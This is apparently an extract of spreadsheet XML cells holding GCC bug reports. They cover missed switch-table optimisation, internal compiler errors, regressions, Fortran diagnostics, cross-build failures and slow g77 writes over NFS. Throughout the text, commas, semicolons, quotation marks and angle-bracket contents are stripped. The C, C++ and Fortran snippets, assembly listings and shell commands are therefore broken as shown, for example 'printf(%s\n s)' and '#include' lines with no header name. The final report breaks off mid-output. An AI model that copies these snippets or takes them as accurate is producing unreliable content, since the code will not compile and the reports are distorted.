    <t>Consider the following code compiled at -O2: (Compiler explorer link: https://godbolt.org/g/GljuJt)
#include 
#include 
#include 
void frobulate(uint32_t v) {
  const char* s
  switch (v) {
    case 0:
      s = foo
      break
    case 1:
      s = bar
      break
    case 2:
      s = spam
      break
    default:
      abort()
      break
  }
  printf(%s\n s)
}
void frobulate_for_gcc(uint32_t v) {
  const char* s
  switch (v) {
    case 0:
      s = foo
      break
    case 1:
      s = bar
      break
    case 2:
      s = spam
      break
    default:
      s = nullptr
      break
  }
  if (s == nullptr) {
    abort()
  }
  printf(%s\n s)
}
------------------------------------------------------------------------------
gcc 6.3 produces the following code. It fails to generate a data table in frobulate even though it it doing a branch beforehand that could be used to insert the abort into. If I add the indirection of checking for the null pointer instead then the check is actually hoisted up into the range check for the table:
frobulate(unsigned int):
        cmp     edi 1
        je      .L3
        jb      .L4
        cmp     edi 2
        jne     .L12
        mov     edi OFFSET FLAT:.LC2
        jmp     puts
.L12:
        sub     rsp 8
        call    abort
.L4:
        mov     edi OFFSET FLAT:.LC0
        jmp     puts
.L3:
        mov     edi OFFSET FLAT:.LC1
        jmp     puts
frobulate_for_gcc(unsigned int):
        cmp     edi 2
        jbe     .L18
.L14:
        sub     rsp 8
        call    abort
.L18:
        mov     edi edi
        mov     rdi QWORD PTR CSWTCH.2[0+rdi*8]
        test    rdi rdi
        je      .L14
        jmp     puts
CSWTCH.2:
        .quad   .LC0
        .quad   .LC1
        .quad   .LC2
------------------------------------------------------------------------------
gcc 7 (20170211) appears to regress further it fails to generate a table in both cases:
frobulate(unsigned int):
        cmp     edi 1
        je      .L3
        jb      .L4
        cmp     edi 2
        jne     .L12
        mov     edi OFFSET FLAT:.LC2
        jmp     puts
.L4:
        mov     edi OFFSET FLAT:.LC0
        jmp     puts
.L3:
        mov     edi OFFSET FLAT:.LC1
        jmp     puts
.L12:
        sub     rsp 8
        call    abort
------------------------------------------------------------------------------
For comparison clang 3.9.1 generates optimal code in both instances:
frobulate(unsigned int):                          # @frobulate(unsigned int)
        cmp     edi 3
        jae     .LBB0_1
        movsxd  rax edi
        mov     rdi qword ptr [8*rax + .Lswitch.table.4]
        jmp     puts                    # TAILCALL
.LBB0_1:
        push    rax
        call    abort
frobulate_for_gcc(unsigned int):                 # @frobulate_for_gcc(unsigned int)
        cmp     edi 3
        jae     .LBB1_1
        movsxd  rax edi
        mov     rdi qword ptr [8*rax + .Lswitch.table.4]
        jmp     puts                    # TAILCALL
.LBB1_1:
        push    rax
        call    abort</t>
  </si>
  <si>
    <t>yuriks</t>
  </si>
  <si>
    <t>GCC-50800</t>
  </si>
  <si>
    <t>Internal compiler error in finish_member_declarations possibly related to may_alias attribute</t>
  </si>
  <si>
    <t>The attached preprocessed testcase results in an internal compiler error:
/home/gaunard/dev/boost/trunk/boost/type_traits/detail/cv_traits_impl.hpp:36:1: internal compiler error: in finish_member_declaration at cp/semantics.c:2559
This seems to be tied to the use of the may_alias attribute.</t>
  </si>
  <si>
    <t>mathias</t>
  </si>
  <si>
    <t>GCC-4518</t>
  </si>
  <si>
    <t>GCC 3.0 fails to install on win32/cygwin</t>
  </si>
  <si>
    <t>Hi
1. Have cygwin ie. gcc version 2.95.3-5(cygwin special)
2. sys type /gcc-lib/i686-pc-cygwin/2.95.3-5
3. trying to upgrade to gcc-3.0 (for java)
4. tried both gcc-3.0.tar.bz2(full) and gcc-core-3.0...+ gcc-java-3.0..
5. make install fails ie. libgcj and large jar file are not built
6. during make install when builddir/fastjar is entered chmod is
run but it reports  that unable to change permissions on /usr/local
   /bin/#instXXXXXX#  no such file or directory where XXXXXX are 6
digits generated by install procedure eg 265683.
7. prior to this gcc.exe gcj.exe etc. have been correctly installed
8. the file from 6. above is in /usr/local/bin but with an .exe suffix ie.
   #inst265683#.exe. This seems to be the problem- an exe file is
generated but chmod is looking for a plain(non-suffixed) file.
9. any ideas?
  Thanks
  Steve Wright.
Release:
unknown
Environment:
Win98/cygwin ie. gcc version 2.95.3-5(cygwin special)
      sys type /gcc-lib/i686-pc-cygwin/2.95.3-5
How-To-Repeat:
Happens every time i try to install GCC 3.0</t>
  </si>
  <si>
    <t>swbg20234</t>
  </si>
  <si>
    <t>GCC-6334</t>
  </si>
  <si>
    <t>Internal compiler error in `reg_save' at dwarf2out.c:951</t>
  </si>
  <si>
    <t>Internal compiler error in `reg_save' at dwarf2out.c:951
Release:
gcc version 2.95.2 19991024 (release)
Environment:
intel</t>
  </si>
  <si>
    <t>skk</t>
  </si>
  <si>
    <t>GCC-43596</t>
  </si>
  <si>
    <t>[4.5 regression] Failed to boostrap</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 157842 gave:
 ../../../src-trunk/libgfortran/intrinsics/perror.c -o perror.o &gt;/dev/null 2&gt;&amp;1
../../../src-trunk/boehm-gc/mark.c: In function 'GC_mark_from':
../../../src-trunk/boehm-gc/mark.c:808:1: internal compiler error: in cselib_lookup_from_insn at cselib.c:1696
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[6]: *** [mark.lo] Error 1
make[6]: Leaving directory `/export/gnu/import/svn/gcc-test/bld/ia64-unknown-linux-gnu/boehm-gc'
Revision 157825 is OK.</t>
  </si>
  <si>
    <t>GCC-57878</t>
  </si>
  <si>
    <t>Incorrect code: live register clobbered in split2</t>
  </si>
  <si>
    <t>Created attachment 30493
Preprocessed source of the test case
$ ./g++_4_8 --version
g++_4_8 (GCC) 4.8.1
Copyright (C) 2013 Free Software Foundation Inc.
(Compiling the attached preprocessed source)
$ ./g++_4_8 -m32 -O2 -fno-omit-frame-pointer -fPIC -std=gnu++11 -c r.ii
$ objdump -d --no-show-raw-insn r.o  &gt; r.s
In the attached r.s in function _ZNSt6vectorIN3FDB9ChunkDataESaIS1_EE19_M_emplace_back_auxIIRKS1_EEEvDpOT_ the sub instruction at address 0xfd writes to edx which is subsequently stored at [rbp-0x24]. edx is immediately clobbered. At 0x119 rbp-0x24 is clobbered and hence the load at 0x168 loads an incorrect value into ecx. 
After reload we see the following:
(insn 117 241 196 7 (parallel [
            (set (reg/f:SI 1 dx [orig:138 D.3282 ] [138])
                (minus:SI (reg/f:SI 1 dx [orig:138 D.3282 ] [138])
                    (reg/v/f:SI 5 di [orig:103 __cur ] [103])))
            (clobber (reg:CC 17 flags))
        ]) 309 {*subsi_1}
     (nil))
(insn 196 117 268 7 (set (mem/c:SI (plus:SI (reg/f:SI 6 bp)
                (const_int -36 [0xffffffffffffffdc])) [21 %sfp+-36 S4 A32])
        (reg/f:SI 1 dx [orig:138 D.3282 ] [138])) 89 {*movsi_internal}
     (expr_list:REG_DEAD (reg/f:SI 1 dx [orig:138 D.3282 ] [138])
        (nil)))
...
(insn 119 274 237 7 (set (reg:DI 0 ax [193])
        (mem:DI (plus:SI (reg/v/f:SI 0 ax [orig:109 __first ] [109])
                (const_int 4 [0x4])) [10 MEM[base: _1 index: _28 offset: 0]+0 S8 A64])) r.ii:197 88 {*movdi_internal}
     (expr_list:REG_DEAD (reg/v/f:SI 0 ax [orig:109 __first ] [109])
        (nil)))
...
(insn 234 120 200 7 (set (reg/f:SI 1 dx [orig:138 D.3282 ] [138])
        (mem/c:SI (plus:SI (reg/f:SI 6 bp)
                (const_int -36 [0xffffffffffffffdc])) [21 %sfp+-36 S4 A32])) r.ii:197 89 {*movsi_internal}
     (expr_list:REG_DEAD (reg/f:SI 138 [ D.3282 ])
        (nil)))
...
(insn 232 122 265 7 (set (mem/c:SI (plus:SI (reg/f:SI 6 bp)
                (const_int -36 [0xffffffffffffffdc])) [21 %sfp+-36 S4 A32])
        (reg/f:SI 1 dx [orig:138 D.3282 ] [138])) r.ii:197 89 {*movsi_internal}
     (nil))
The fill in 234 and the second spill in 232 are redundant. Insn 234 gets removed by ce3 later but 234 remains till the end. Meanwhile 119 writes to a DI mode register and gets split by split2 into eax and edx and hence the store in 232 ends up clobbering the right value. 
When compiled with a trunk built 2 weeks ago the compiler ICEs with the following stacck trace:
r.ii: In member function â€˜void std::vector::_M_emplace_back_aux(_Args _Tp = FDB::ChunkData _Alloc = std::allocator]â€™:
r.ii:192:3: internal compiler error: in assign_by_spills at lra-assigns.c:1266
   }
   ^
0x9ba360 assign_by_spills
	/usr/local/google/home/eraman/gcc/trunk/gcc/lra-assigns.c:1266
0x9bb013 lra_assign()
	/usr/local/google/home/eraman/gcc/trunk/gcc/lra-assigns.c:1423
0x9b71b9 lra(_IO_FILE*)
	/usr/local/google/home/eraman/gcc/trunk/gcc/lra.c:2342
0x97d7b8 do_reload
	/usr/local/google/home/eraman/gcc/trunk/gcc/ira.c:4689
0x97d7b8 rest_of_handle_reload
	/usr/local/google/home/eraman/gcc/trunk/gcc/ira.c:4801</t>
  </si>
  <si>
    <t>eraman</t>
  </si>
  <si>
    <t>GCC-1428</t>
  </si>
  <si>
    <t>test PR received via mailing list mechanism</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: Just a test.
</t>
  </si>
  <si>
    <t>GCC-37639</t>
  </si>
  <si>
    <t>Bootstrap fails with may be used uninitialized warning in c-parser.c</t>
  </si>
  <si>
    <t>GCC-9411</t>
  </si>
  <si>
    <t>[3.4 regression] [New parser] Template function lookup problem</t>
  </si>
  <si>
    <t>The testcase below fails with
~/ix86/gcc3.4/bin/g++ -c parser3.cpp -Wall
parser3.cpp: In function `void bar(const D&amp;) [with D = int]':
parser3.cpp:14:   instantiated from here
parser3.cpp:9: error: no matching function for call to `Evaluator::foo(const 
   int&amp;)'
if not explicitly specifying the  it works. Earlier
g++ are fine so is intel icpc in -ansi mode.
struct Evaluator {
        template 
        void foo(const B
}
template 
void bar(const D&amp; d)
{
        Evaluator().foo(d)
}
void foobar()
{
        bar(1)
}
Release:
g++ (GCC) 3.4 20030122 (experimental)
Environment:
ix86-linux</t>
  </si>
  <si>
    <t>GCC-29454</t>
  </si>
  <si>
    <t>Slightly wrong error message for IF statement</t>
  </si>
  <si>
    <t>$ cat foo.f90 
  logical l(2)
  if (l) call abort
  end
$ gfortran foo.f90
 In file foo.f90:2
  if (l) call abort
     1
Error: ELSE IF clause at (1) requires a scalar LOGICAL expression</t>
  </si>
  <si>
    <t>GCC-6043</t>
  </si>
  <si>
    <t>IICE on ia64 for Blitz config test for C++ complex math</t>
  </si>
  <si>
    <t>The GCC 3.1 prerelease and GCC 3.0.4 C++ compilers ICE on
ia64-unknown-linux-gnu when compiling a configuration test
for Blitz that checks for support of complex math:
compmath.cpp: In function `int main()':
compmath.cpp:18: Internal compiler error in change_address_1 at emit-rtl.c:
   1910
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I'm attaching the unpreprocessed file since it only
includes  and the preprocessed file is huge.  I'm
sure someone will let me know if they want the whole thing.
Release:
gcc version 3.1 20020321 (prerelease)
Environment:
Itanium Red Hat Linux release 7.2 (Enigma)
How-To-Repeat:
Compile compmath.cpp with default options.</t>
  </si>
  <si>
    <t>GCC-71368</t>
  </si>
  <si>
    <t>[concepts] ICE on constrained compound requirement</t>
  </si>
  <si>
    <t>The following produces an ICE on both GCC 6.1 and trunk (rev. 236974):
$ cat main.cpp
struct inner
template concept bool CompoundReq = requires {
    // fine with concrete type in trailing type i.e. inner&amp; instead of X&amp;
    { X::inner_member() } -&gt; X
}
template concept bool Concept = requires {
    { X::outer_member() } -&gt; CompoundReq
}
struct inner { static inner }
struct outer { static inner outer_member() }
int main()
{
    // fine
    static_assert( CompoundReq )
    static_assert( CompoundReq )
    // ICE
    static_assert( Concept )
}
$ g++-trunk -std=c++1z -fconcepts main.cpp
g++-trunk: internal compiler error: Segmentation fault (program cc1plus)</t>
  </si>
  <si>
    <t>GCC-1223</t>
  </si>
  <si>
    <t>gcj crashes on inner classes/interfaces definition/usage.</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: There is an attached patch.
</t>
  </si>
  <si>
    <t>GCC-19497</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 regression] Invalid declaration in template diagnosed too late</t>
  </si>
  <si>
    <t>The following invalid code snippet is rejected since gcc 3.4.0.
============================
template struct A
{
    A::A
}
============================
It's rejected if I instantiate the template but not at definition time.</t>
  </si>
  <si>
    <t>GCC-57637</t>
  </si>
  <si>
    <t>[4.9 regression] Miscompare on 178.galgel in SPEC2000 on arm</t>
  </si>
  <si>
    <t>We're getting a miscompare on the 178.galgel benchmark in SPEC2000 on armv7l-unknown-linux-gnueabihf on a Cortex-A15.
The .mis file just says 'galgel.out' short.
Bisection shows it started with r199439.
2013-05-30 Bernd Schmidt 
Zhenqiang Chen 
    config/arm/arm-protos.h: Add and update function protos.
    config/arm/arm.c (use_simple_return_p): New added.
    (thumb2_expand_return): Check simple_return flag.
    config/arm/arm.md: Add simple_return and conditional simple_return.
    config/arm/iterators.md: Add iterator for return and simple_return.
The compiler was configured: --with-cpu=cortex-a15 --with-fpu=neon-vfpv4 --with-mode=thumb --with-float=hard --enable-languages=cc++fortran
The flags for the benchmark are -ffixed-form -mthumb -mcpu=cortex-a15 -mfpu=neon-vfpv4 -mfloat-abi=hard -O3.
It works with -O1 fails at -O2 and -O3</t>
  </si>
  <si>
    <t>GCC-79840</t>
  </si>
  <si>
    <t>Inconsistent exclamation mark in diagnostic</t>
  </si>
  <si>
    <t>from fortran/module.c:
gfc_fatal_error (Can't USE the same %smodule we're building! ...)
This diagnostic uses an exclamation mark as opposed to all the others that don't use any punctuation at all. It also talks about we which is different from all other diagnostics.
The diagnostic should follow the same pattern as all the other ones.</t>
  </si>
  <si>
    <t>GCC-52335</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6/4.7 Regression] I/O: -std=f95 rejects valid DELIM= in OPEN</t>
  </si>
  <si>
    <t>http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/9942915c9c41b151
open(unit=lunnmlfile=nmlfiledelim='apostrophe'status='old') 
                                                               1
Error: Fortran 2003: DELIM= at (1) not allowed in Fortran 95
However Fortran 95 has:
  R904 open-stmt     is   OPEN ( connect-spec-list )
  R905 connect-spec  is   ...
                     or   DELIM = scalar-default-char-expr
and
9.3.4.9 DELIM= specifier in the OPEN statement
 The scalar-default-char-expr shall evaluate to APOSTROPHE QUOTE or NONE. [...]
Note: gfortran correctly allows:
  inquire(nunit delim=str)
I think the bogus check has been introduced when Fortran 2003's
  9.5.1.7 DELIM= specifier in a data transfer statement
was implemented.
The reason seems to be that OPEN and data-transfer (READ/WRITE) share the delim= checking.</t>
  </si>
  <si>
    <t>GCC-15334</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE building libgcc/./_mulvsi3.o for m68hc11-unknown-elf</t>
  </si>
  <si>
    <t>Create a combined tree as per 
of date Mon May  3 23:42:42 UTC 2004.  Configure with the option
--target=m68hc11-unknown-elf (simtest-howto also lists other options I strongly
believe are redundant).  Build with make all.  Observe the build failing:
...
/home/hp/cvs_areas/combined/m68hc11-obj/gcc/xgcc
-B/home/hp/cvs_areas/combined/m68hc11-obj/gcc/ -nostdinc
-B/home/hp/cvs_areas/co\
mbined/m68hc11-obj/m68hc11-unknown-elf/newlib/ -isystem
/home/hp/cvs_areas/combined/m68hc11-obj/m68hc11-unknown-elf/newlib/targ-i\
nclude -isystem /home/hp/cvs_areas/combined/combined/newlib/libc/include
-B/tmp/m68hc11/m68hc11-unknown-elf/bin/ -B/tmp/m68hc11/m\
68hc11-unknown-elf/lib/ -isystem /tmp/m68hc11/m68hc11-unknown-elf/include
-isystem /tmp/m68hc11/m68hc11-unknown-elf/sys-include -\
L/home/hp/cvs_areas/combined/m68hc11-obj/ld -Os -mrelax  -DUSE_GAS -DIN_GCC -g 
-DIN_LIBGCC2 -I. -I -I/home/hp/cvs_areas/combined\
/combined/gcc -I/home/hp/cvs_areas/combined/combined/gcc/
-I/home/hp/cvs_areas/combined/combined/gcc/../include  -DL_mulvsi3 -c /\
home/hp/cvs_areas/combined/combined/gcc/libgcc2.c -o libgcc/./_mulvsi3.o
/home/hp/cvs_areas/combined/combined/gcc/libgcc2.c: In function `__mulvsi3':
/home/hp/cvs_areas/combined/combined/gcc/libgcc2.c:139: error: unrecognizable
insn:
(insn:HI 152 151 47 3 /home/hp/cvs_areas/combined/combined/gcc/libgcc2.c:133
(parallel [
            (set (reg:SI 71)
                (lshiftrt:SI (reg:SI 63)
                    (const_int 31 [0x1f])))
            (clobber (scratch:HI))
        ]) -1 (insn_list 151 (nil))
    (expr_list:REG_DEAD (reg:SI 63)
        (expr_list:REG_UNUSED (scratch:HI)
            (expr_list:REG_EQUAL (lshiftrt:SI (reg:SI 68)
                    (const_int 31 [0x1f]))
                (nil)))))
/home/hp/cvs_areas/combined/combined/gcc/libgcc2.c:139: internal compiler error:
in extract_insn at recog.c:2074</t>
  </si>
  <si>
    <t>GCC-8315</t>
  </si>
  <si>
    <t>Bad reordering in -O3</t>
  </si>
  <si>
    <t>Found this trying to build XEmacs 21.1.14.  At -O3 ordering is not maintained on the two function pointer assignments near the top of `init_ralloc' (just under the assignment to `r_alloc_initialized').  The same value gets stored in both locations.
Release:
3.2
Environment:
RedHat Linux 7.3 on i686 (Pentium IV)</t>
  </si>
  <si>
    <t>gyro</t>
  </si>
  <si>
    <t>GCC-60853</t>
  </si>
  <si>
    <t>[OOP] Failure to disambiguate generic with unlimited polymorphic</t>
  </si>
  <si>
    <t>Created attachment 32609
F90 reproducer
The attached reproducer shows the compiler failing to disambiguate two type-bound procedures. TKR should disambiguate these procedures as one acts on a scalar while the other acts on a 1D array.   Not that if assignment(=) is replaced by something else e.g. copy then the code is accepted.  (Possibly I've missed something about implied ELEMENTAL in assignment?   But other compilers do accept this code.)
Details for my environment:
gfortran -c -v -save-temps unlimitePolymorphicGeneric.F90
Using built-in specs.
COLLECT_GCC=gfortran
Target: x86_64-apple-darwin12
Configured with: /opt/local/var/macports/build/_opt_mports_dports_lang_gcc49/gcc49/work/gcc-4.9-20140406/configure --prefix=/opt/local --build=x86_64-apple-darwin12 --enable-languages=cc++objcobj-c++fortranjava --libdir=/opt/local/lib/gcc49 --includedir=/opt/local/include/gcc49 --infodir=/opt/local/share/info --mandir=/opt/local/share/man --datarootdir=/opt/local/share/gcc-4.9 --with-local-prefix=/opt/local --with-system-zlib --disable-nls --program-suffix=-mp-4.9 --with-gxx-include-dir=/opt/local/include/gcc49/c++/ --with-gmp=/opt/local --with-mpfr=/opt/local --with-mpc=/opt/local --with-cloog=/opt/local --enable-cloog-backend=isl --disable-cloog-version-check --enable-stage1-checking --disable-multilib --enable-lto --enable-libstdcxx-time --with-as=/opt/local/bin/as --with-ld=/opt/local/bin/ld --with-ar=/opt/local/bin/ar --with-bugurl=https://trac.macports.org/newticket --with-pkgversion='MacPorts gcc49 4.9-20140406_0'
Thread model: posix
gcc version 4.9.0 20140406 (experimental) (MacPorts gcc49 4.9-20140406_0) 
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.8.5' '-c' '-v' '-save-temps' '-mtune=core2'
 /opt/local/libexec/gcc/x86_64-apple-darwin12/4.9.0/f951 unlimitePolymorphicGeneric.F90 -cpp=/var/folders/n1/j8dsqkvd1935f8myzbps0b6c0ytd28/T//ccVIYsF4.f90 -quiet -v -D__DYNAMIC__ unlimitePolymorphicGeneric.F90 -fPIC -quiet -dumpbase unlimitePolymorphicGeneric.F90 -mmacosx-version-min=10.8.5 -mtune=core2 -auxbase unlimitePolymorphicGeneric -version -fintrinsic-modules-path /opt/local/lib/gcc49/gcc/x86_64-apple-darwin12/4.9.0/finclude -o unlimitePolymorphicGeneric.s
GNU Fortran (MacPorts gcc49 4.9-20140406_0) version 4.9.0 20140406 (experimental) (x86_64-apple-darwin12)
	compiled by GNU C version 4.9.0 20140406 (experimental) GMP version 6.0.0 MPFR version 3.1.1-p2 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /opt/local/lib/gcc49/gcc/x86_64-apple-darwin12/4.9.0/../../../../../x86_64-apple-darwin12/include
#include ... search starts here:
#include  search starts here:
 /opt/local/lib/gcc49/gcc/x86_64-apple-darwin12/4.9.0/finclude
 /opt/local/lib/gcc49/gcc/x86_64-apple-darwin12/4.9.0/include
 /opt/local/include
 /opt/local/lib/gcc49/gcc/x86_64-apple-darwin12/4.9.0/include-fixed
 /usr/include
End of search list.
GNU Fortran (MacPorts gcc49 4.9-20140406_0) version 4.9.0 20140406 (experimental) (x86_64-apple-darwin12)
	compiled by GNU C version 4.9.0 20140406 (experimental) GMP version 6.0.0 MPFR version 3.1.1-p2 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
unlimitePolymorphicGeneric.F90:8.33:
      generic :: assignment(=) =&gt; copyFromScalar copyFromArray
                                 1
Error: Ambiguous interfaces 'copyfromarray' and 'copyfromscalar' in intrinsic assignment operator at (1)</t>
  </si>
  <si>
    <t>Thomas.L.Clune</t>
  </si>
  <si>
    <t>GCC-27657</t>
  </si>
  <si>
    <t>[4.2 regression] bogus undefined reference error to static var with -g and -O</t>
  </si>
  <si>
    <t>I get an undefined reference error when linking two files but that variable is static.  This only happens with gcc 4.2 and only when I enable both -g and -O1 (or higher).
(sid)473:tbm@reyes: ~] cat test.c
static const char utf8_skip_data[1] = {1}
static const char * const gconf_g_utf8_skip = utf8_skip_data
(sid)474:tbm@reyes: ~] cat main.c
int main() {
}
(sid)475:tbm@reyes: ~] gcc -c -o main.o main.c
(sid)476:tbm@reyes: ~] gcc -c -g -O2 -o test.o test.c
(sid)477:tbm@reyes: ~] gcc main.o test.o
test.o:(.debug_info+0x93): undefined reference to `utf8_skip_data'
collect2: ld returned 1 exit status
zsh: exit 1     gcc main.o test.o
(sid)478:tbm@reyes: ~] gcc-4.1 -c -g -O2 -o test.o test.c
(sid)479:tbm@reyes: ~] gcc main.o test.o
(sid)480:tbm@reyes: ~] gcc -c -g -O0 -o test.o test.c
(sid)481:tbm@reyes: ~] gcc main.o test.o
(sid)482:tbm@reyes: ~]
This is with 4.2.0 20060419.  20060517 shows the same.</t>
  </si>
  <si>
    <t>GCC-6309</t>
  </si>
  <si>
    <t>building solaris2.7 target on linux error: cannot find stdio.h</t>
  </si>
  <si>
    <t>after having compiled binutils with --target=sparc-sun-solaris2.7 gcc build fails because it cannot finc stdio.h when compiling gmon-sol2
make
make[1]: Entering directory `/workspace/sophana/build-gcc/libiberty'
make[2]: Entering directory `/workspace/sophana/build-gcc/libiberty/testsuite'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/workspace/sophana/build-gcc/libiberty/testsuite'
make[1]: Leaving directory `/workspace/sophana/build-gcc/libiberty'
make[1]: Entering directory `/workspace/sophana/build-gcc/zlib'
make[1]: Leaving directory `/workspace/sophana/build-gcc/zlib'
make[1]: Entering directory `/workspace/sophana/build-gcc/fastjar'
make[1]: Leaving directory `/workspace/sophana/build-gcc/fastjar'
make[1]: Entering directory `/workspace/sophana/build-gcc/gcc'
(cd intl &amp;&amp; make all)
make[2]: Entering directory `/workspace/sophana/build-gcc/gcc/intl'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/workspace/sophana/build-gcc/gcc/intl'
(cd po &amp;&amp; make all)
make[2]: Entering directory `/workspace/sophana/build-gcc/gcc/po'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/workspace/sophana/build-gcc/gcc/po'
        -c ../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c -o gmon.o
In file included from ../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:36:
../../gcc-3.0.4/gcc/system.h:50:19: stdio.h: No such file or directory
In file included from ../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:36:
../../gcc-3.0.4/gcc/system.h:92:23: sys/types.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:94:19: errno.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:101:21: string.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:102:22: strings.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:114:21: stdlib.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:123:21: unistd.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:127:24: sys/param.h: No such file or directory
In file included from ../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:36:
../../gcc-3.0.4/gcc/system.h:179:23: sys/time.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:180:19: time.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:192:20: fcntl.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:230:22: sys/wait.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:301:20: malloc.h: No such file or directory
../../gcc-3.0.4/gcc/system.h:385:23: sys/stat.h: No such file or directory
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c: In function `monstartup':
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:112: warning: implicit declaration of function `sbrk'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:112: warning: assignment makes pointer from integer without a cast
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:114: warning: implicit declaration of function `write'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:136: warning: assignment makes pointer from integer without a cast
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c: In function `_mcleanup':
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:181: `PATH_MAX' undeclared (first use in this function)
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:181: (Each undeclared identifier is reported only once
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:181: for each function it appears in.)
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:186: warning: implicit declaration of function `getenv'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:186: warning: assignment makes pointer from integer without a cast
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:192: warning: implicit declaration of function `strrchr'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:198: warning: implicit declaration of function `sprintf'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:198: warning: implicit declaration of function `getpid'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:204: warning: implicit declaration of function `creat'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:206: warning: implicit declaration of function `perror'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:231: warning: implicit declaration of function `close'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:181: warning: unused variable `buf'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c: In function `internal_mcount':
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:299: warning: implicit declaration of function `atexit'
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c: In function `moncontrol':
../../gcc-3.0.4/gcc/config/sparc/gmon-sol2.c:413: warning: implicit declaration of function `profil'
make[1]: *** [gmon.o] Error 1
make[1]: Leaving directory `/workspace/sophana/build-gcc/gcc'
make: *** [all-gcc] Error 2
Release:
unknown
Environment:
linux redhat 7.1
binutils-2.12
gcc-3.0.4
How-To-Repeat:
on linux
configure --target=sparc-sun-solaris2.7 -prefix=...
make</t>
  </si>
  <si>
    <t>sophana</t>
  </si>
  <si>
    <t>GCC-16970</t>
  </si>
  <si>
    <t>long write times via NFS</t>
  </si>
  <si>
    <t>When a g77-compiled standard FORTRAN77 program writes out a file to an
NFS-mounted remote partition I/O performance dramatically drops.
Same program on the same machine writes out the same file in a very short time
when writing to a local partition.
Once created on the local filesystem the output file can be written to the
NFS-mounted remote partition in a very short time using cp(1) or mv(1).
This behaviour seems g77-specific since other [proprietary... :( ] FORTRAN
compilers don't have the same issue.
I reproduced the behaviour with several versions of g77 among with:
$ g77 -v 
g77 version 2.95.4 20011002 (Debian prerelease) (from FSF-g77 version 0.5.25 200
10319 (prerelease))
Driving: g77 -v -c -xf77-version /dev/null -xnone
Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs
gcc version 2.95.4 20011002 (Debian prerelease)
 /usr/lib/gcc-lib/i386-linux/2.95.4/cpp0 -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR_
_=95 -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(pos
ix) -D_LANGUAGE_FORTRAN -traditional -Acpu(i386) -Amachine(i386) -Di386 -D__i386
 -D__i386__ /dev/null /dev/null
GNU CPP version 2.95.4 20011002 (Debian prerelease) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/2.95.4/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../i386-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i386-linux/2.95.4/f771 -fnull-version -quiet -dumpbase g77-ver
sion.f -version -fversion -o /tmp/cc7Qj77b.s /dev/null
GNU F77 version 2.95.4 20011002 (Debian prerelease) (i386-linux) compiled by GNU
 C version 2.95.4 20011002 (Debian prerelease).
GNU Fortran Front End version 0.5.25 20010319 (prerelease)
 as -V -Qy -o /tmp/cc6Ymqqe.o /tmp/cc7Qj77b.s
GNU assembler version 2.13.90.0.18 (i386-linux) using BFD version 2.13.90.0.18 2
0030121 Debian GNU/Linux
 ld -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o /tmp/ccpZKWDe /tmp/cc6Ymqq
e.o /usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.
